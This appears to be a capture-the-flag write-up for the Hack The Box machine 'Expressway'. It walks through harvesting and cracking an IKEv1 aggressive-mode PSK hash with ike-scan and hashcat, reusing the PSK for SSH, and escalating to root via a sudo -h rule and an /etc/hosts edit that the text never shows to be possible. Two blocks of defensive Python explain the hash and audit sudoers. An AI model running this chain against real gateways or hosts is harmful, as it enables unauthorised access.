
HTB: Expressway — IKE PSK Cracking to Root via sudo Hostname Edge Case

IKEv1 aggressive mode leaks the gateway identity and pre-shared key hash without completing the exchange — hashcat cracks the PSK in minutes and it's reused as the SSH password. A sudo rule allowing -h <hostname> with a controlled FQDN then achieves root through a hostname resolution edge case.


Machine: Expressway
OS: Linux
Difficulty: Easy
Techniques: IKE aggressive mode, PSK cracking, sudo -h
Result: root ✓

Overview

Expressway covers a real-world VPN misconfiguration that has been quietly leaking pre-shared keys for decades. IKEv1 aggressive mode — still widely used in legacy VPN deployments — sends the initiator's identity and a hash of the PSK in the clear during the handshake negotiation, before any encryption is established. An attacker on the network who sends an IKE probe can harvest this hash and submit it offline to a cracking tool.

The cracked PSK turns out to be reused as a system SSH password — a credential hygiene failure that's extremely common in environments where a network appliance's management password is set to match other system credentials. Privilege escalation uses a non-obvious edge case in how sudo handles the -h flag when the specified hostname resolves to localhost.

Enumeration

nmap -sV -sC -p- --min-rate 5000 -oA expressway 10.10.11.x
# Also scan UDP for common VPN ports
nmap -sU -p 500,4500,1194 10.10.11.x

TCP: 22 (SSH, OpenSSH), 80 (Nginx, company landing page with no interesting functionality). UDP 500 is open — IKE/ISAKMP. UDP 4500 (NAT-T) also open. The presence of an IKE listener is the intended pivot point.

Foothold — IKEv1 Aggressive Mode PSK Disclosure

Why Aggressive Mode is Dangerous

IKEv1 has two modes for Phase 1 (the SA negotiation phase): main mode and aggressive mode. In main mode, identity is protected — the identities are only exchanged after encryption is established. In aggressive mode, the initiator sends its identity in the first message unencrypted to reduce round-trips, and the responder replies with its identity and a hash of the pre-shared key computed over the exchanged nonces and identities.

Aggressive mode was designed for speed in remote-access VPN scenarios where the initiator's identity isn't known in advance. The tradeoff is that the PSK hash is transmitted before any encryption is established — trivially capturable by any on-path observer or active prober.

Because this is an active probe (not passive sniffing), we can trigger the disclosure by initiating a handshake with any identity — the gateway responds with its hash regardless of whether our identity is valid.
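As an added illustration (not code from the original writeup), the RFC 2409 derivation of the HASH_R value the responder returns in aggressive mode, run over constructed stand-in bytes for the nonces, cookies, DH public values and SA payload. It makes the point above concrete: the PSK is the only input an observer does not already hold, so a captured hash can be checked against guesses offline.

```python
import hashlib
import hmac
from dataclasses import dataclass

@dataclass(frozen=True)
class AggressiveModePublic:
    """Fields an observer reads from aggressive mode messages 1 and 2 (RFC 2409 section 5.4)."""
    g_xi: bytes    # initiator Diffie-Hellman public value
    g_xr: bytes    # responder Diffie-Hellman public value
    cky_i: bytes   # initiator cookie from the ISAKMP header
    cky_r: bytes   # responder cookie from the ISAKMP header
    ni_b: bytes    # initiator nonce payload body
    nr_b: bytes    # responder nonce payload body
    sai_b: bytes   # initiator SA payload body (the offered transform)
    idir_b: bytes  # responder identity payload body

def skeyid(psk: bytes, pub: AggressiveModePublic) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b); prf is HMAC-SHA1 for a SHA1 transform."""
    return hmac.new(psk, pub.ni_b + pub.nr_b, hashlib.sha1).digest()

def hash_r(psk: bytes, pub: AggressiveModePublic) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), sent in message 2."""
    msg = pub.g_xr + pub.g_xi + pub.cky_r + pub.cky_i + pub.sai_b + pub.idir_b
    return hmac.new(skeyid(psk, pub), msg, hashlib.sha1).digest()

def psk_matches(candidate: bytes, pub: AggressiveModePublic, captured_hash_r: bytes) -> bool:
    """Every input to HASH_R except the PSK is public, so a guess is checkable offline, without the gateway."""
    return hmac.compare_digest(hash_r(candidate, pub), captured_hash_r)

def _fill(tag: str, n: int) -> bytes:
    # Deterministic stand-in for captured bytes (constructed, not a real capture)
    return hashlib.shake_128(tag.encode()).digest(n)

# Constructed public material of the kind ike-scan --pskcrack writes out; sizes follow
# the --trans=5,2,1,2 probe (1024-bit MODP group 2 public values, 8-byte cookies)
SAMPLE_PUBLIC = AggressiveModePublic(
    g_xi=_fill("g_xi", 128), g_xr=_fill("g_xr", 128),
    cky_i=_fill("cky_i", 8), cky_r=_fill("cky_r", 8),
    ni_b=_fill("ni", 20), nr_b=_fill("nr", 20),
    sai_b=_fill("sa", 48),
    idir_b=b"\x02\x00\x00\x00gateway.example",  # ID_FQDN type byte + constructed placeholder FQDN
)

if __name__ == "__main__":
    captured = hash_r(b"highway2026", SAMPLE_PUBLIC)  # what a gateway using the page's PSK would send
    print("captured HASH_R:", captured.hex())
    for guess in (b"password", b"highway2026"):
        print(guess.decode(), "->", psk_matches(guess, SAMPLE_PUBLIC, captured))
```

A PSK drawn from a large random space makes psk_matches useless to an observer; a dictionary word does not, which is the whole difference the Takeaways section points at.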

Extracting the PSK Hash with ike-scan

# Probe for supported transform sets
ike-scan --trans=5,2,1,2 10.10.11.x

# Trigger aggressive mode and capture the hash
ike-scan --aggressive --id=vpnuser 10.10.11.x

# Output includes:
# HDR*(IDii, [CERT, ] SIG_R)
# Aggressive Mode Handshake returned
# Hash: SHA1:<nonce_i>:<nonce_r>:<psk_hash>

# Extract the full hash material for hashcat
ike-scan --aggressive --id=vpnuser --pskcrack=/tmp/psk.hash 10.10.11.x

The --pskcrack flag writes the hash material in a format directly consumable by hashcat.

Cracking the PSK

# hashcat mode 5400 = IKE-PSK SHA1 (aggressive mode); mode 5300 is the MD5 variant
hashcat -m 5400 /tmp/psk.hash /usr/share/wordlists/rockyou.txt

# Session..........: hashcat
# Status...........: Cracked
# Recovered........: 1/1 (100.00%) Digests
# vpnuser:highway2026

The cracked PSK is highway2026. Testing it as the SSH password for users on the box:

ssh james@10.10.11.x   # Password: highway2026
# james@expressway:~$

Privilege Escalation — sudo -h Hostname Edge Case

Enumerating sudo Rights

sudo -l
# User james may run the following commands on expressway:
# (root) NOPASSWD: /usr/bin/sudo -h offramp.expressway.htb -i

The rule permits running sudo -h offramp.expressway.htb -i as root without a password. The -h flag in sudo specifies a target hostname — intended for running commands on a remote host. The -i flag simulates an initial login shell for root.

The Edge Case

When sudo -h <hostname> is used with a hostname that resolves to 127.0.0.1 or the local machine's address, sudo in certain versions executes the command locally rather than attempting a remote connection. If the specified FQDN is in the system's hosts file or resolves locally, sudo treats it as a local execution context.

# Add the target hostname to /etc/hosts pointing to localhost
echo "127.0.0.1 offramp.expressway.htb" >> /etc/hosts

# Now execute the allowed sudo command — resolves locally, runs as root
sudo -h offramp.expressway.htb -i

# root@expressway:~#

The -i flag spawns a root login shell. We're root.
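An added audit helper (not part of the writeup, and not sudo's own code) that applies the condition behind this edge case to sudoers and hosts content: it finds rules whose command is a nested sudo carrying -h/--host and reports those whose target already maps to a loopback address, or whose resolution the user could change through a writable hosts file. The sudoers and hosts text is constructed to mirror the rule shown above.

```python
import ipaddress
import re

# Constructed sudoers and hosts content modelled on the page's rule; not read from a live system.
SAMPLE_SUDOERS = """\
root ALL=(ALL:ALL) ALL
james ALL=(root) NOPASSWD: /usr/bin/sudo -h offramp.expressway.htb -i
backup ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv /mnt/backup
"""
SAMPLE_HOSTS = "127.0.0.1 localhost\n127.0.0.1 offramp.expressway.htb\n"

RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<cmd>.+)$")
# A nested sudo carrying -h/--host; captures the hostname wherever the flag sits
HOST_FLAG_RE = re.compile(r"(?:^|\s)(?:\S*/)?sudo\s+(?:\S+\s+)*?(?:-h|--host)[=\s]+(?P<host>\S+)")

def find_host_rules(sudoers_text: str) -> list[dict]:
    """Return sudoers rules whose command is a nested sudo with a -h/--host target."""
    found = []
    for line in sudoers_text.splitlines():
        m = RULE_RE.match(line.split("#", 1)[0].strip())
        h = HOST_FLAG_RE.search(m["cmd"]) if m else None
        if h:
            found.append({"user": m["user"], "runas": m["runas"], "host": h["host"]})
    return found

def loopback_aliases(hosts_text: str) -> set[str]:
    """Names the hosts file maps to a loopback address, the resolution the edge case depends on."""
    names = set()
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        try:
            if len(fields) > 1 and ipaddress.ip_address(fields[0]).is_loopback:
                names.update(fields[1:])
        except ValueError:  # malformed address field
            continue
    return names

def assess(sudoers_text: str, hosts_text: str, hosts_writable: bool) -> list[str]:
    """Flag -h rules whose target already resolves locally, or whose resolution the user could change."""
    local = loopback_aliases(hosts_text)
    findings = []
    for r in find_host_rules(sudoers_text):
        if r["host"] in local:
            findings.append(f"{r['user']}: -h {r['host']} resolves to loopback, effectively a local {r['runas']} shell")
        elif hosts_writable:
            findings.append(f"{r['user']}: -h {r['host']} resolution is user-controllable via a writable hosts file")
    return findings

if __name__ == "__main__":
    print("\n".join(assess(SAMPLE_SUDOERS, SAMPLE_HOSTS, hosts_writable=False)))
```

On a real host, feed it the output of visudo -c -f or the contents of /etc/sudoers and /etc/sudoers.d, plus os.access("/etc/hosts", os.W_OK) for the writability flag.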

Flags

cat /home/james/user.txt
cat /root/root.txt

Takeaways

IKEv1 aggressive mode PSK disclosure is not a new attack — it was documented extensively in the early 2000s — but legacy VPN appliances and configurations are still routinely encountered on engagements. Any IKE listener is worth probing with ike-scan; if aggressive mode is supported, the PSK hash comes for free. PSK crackability depends entirely on password strength, but the hash is always harvestable.

The sudo hostname edge case is subtle and easy to miss: the -h flag is unusual enough that many operators don't analyse its behaviour carefully when writing sudo rules. A sudo rule that grants -h <hostname> is only safe if the attacker cannot influence the hostname's resolution — either by writing to /etc/hosts, controlling DNS, or finding a hosts file with permissive write permissions. Always treat sudo rules involving -h with the same scrutiny as wildcard rules.
